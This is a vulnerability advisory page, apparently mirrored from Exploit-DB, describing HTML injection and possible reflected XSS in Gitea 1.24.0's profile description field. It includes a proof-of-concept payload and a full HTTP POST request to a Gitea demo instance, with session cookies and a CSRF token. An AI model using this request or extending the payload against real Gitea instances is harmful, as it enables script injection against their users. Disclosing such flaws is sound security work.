header-logo
Suggest Exploit
vendor:
Gitea
by:
Mikail KOCADAĞ
4.1
CVSS
MEDIUM
HTML Injection and potentially Reflected XSS
79
CWE
Product Name: Gitea
Affected Version From: 1.24.0
Affected Version To: 1.24.0
Patch Exists: NO
Related CWE:
CPE: a:gitea:gitea:1.24.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Linux Ubuntu 22.04
2025

Gitea 1.24.0 – HTML Injection

Gitea version 1.24.0 is susceptible to HTML Injection and potentially Reflected Cross-Site Scripting (XSS) through the 'description' parameter on the user settings page. The lack of proper sanitization of user-supplied HTML content allows malicious scripts to be executed in the user's browser, leading to potential attacks. An attacker can inject malicious HTML or JavaScript code into their profile description, which gets executed when saved, demonstrating the presence of the vulnerability.

Mitigation:

To mitigate this vulnerability, input validation and proper sanitization should be implemented to filter out any potentially malicious HTML or script content entered by users. Additionally, encoding user-supplied data before displaying it can help prevent successful exploitation.
Source

Exploit-DB raw data:

# Exploit Title: Gitea 1.24.0 - HTML Injection
# Date: 2025-03-09
# Exploit Author: Mikail KOCADAĞ
# Vendor Homepage: https://gitea.com
# Software Link: https://dl.gitea.io/gitea/1.24.0/
# Version: 1.24.0
# Tested on: Windows 10, Linux Ubuntu 22.04
# CVE : N/A

## Vulnerability Description:
In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability.

## Exploit PoC:
[https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz]

## Paload:<h1>deneme</h1>
### **1. Request:**
POST /user/settings HTTP/2
Host: demo.gitea.com
Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
Content-Length: 312
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: tr-TR,tr;q=0.9
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

_csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
&full_name=Abuzettin
&description=%3Ch1%3Edeneme%3C%2Fh1%3E
&website=
&location=
&visibility=0
&keep_email_private=on

Navigation

Suggest Exploit

Services By CQR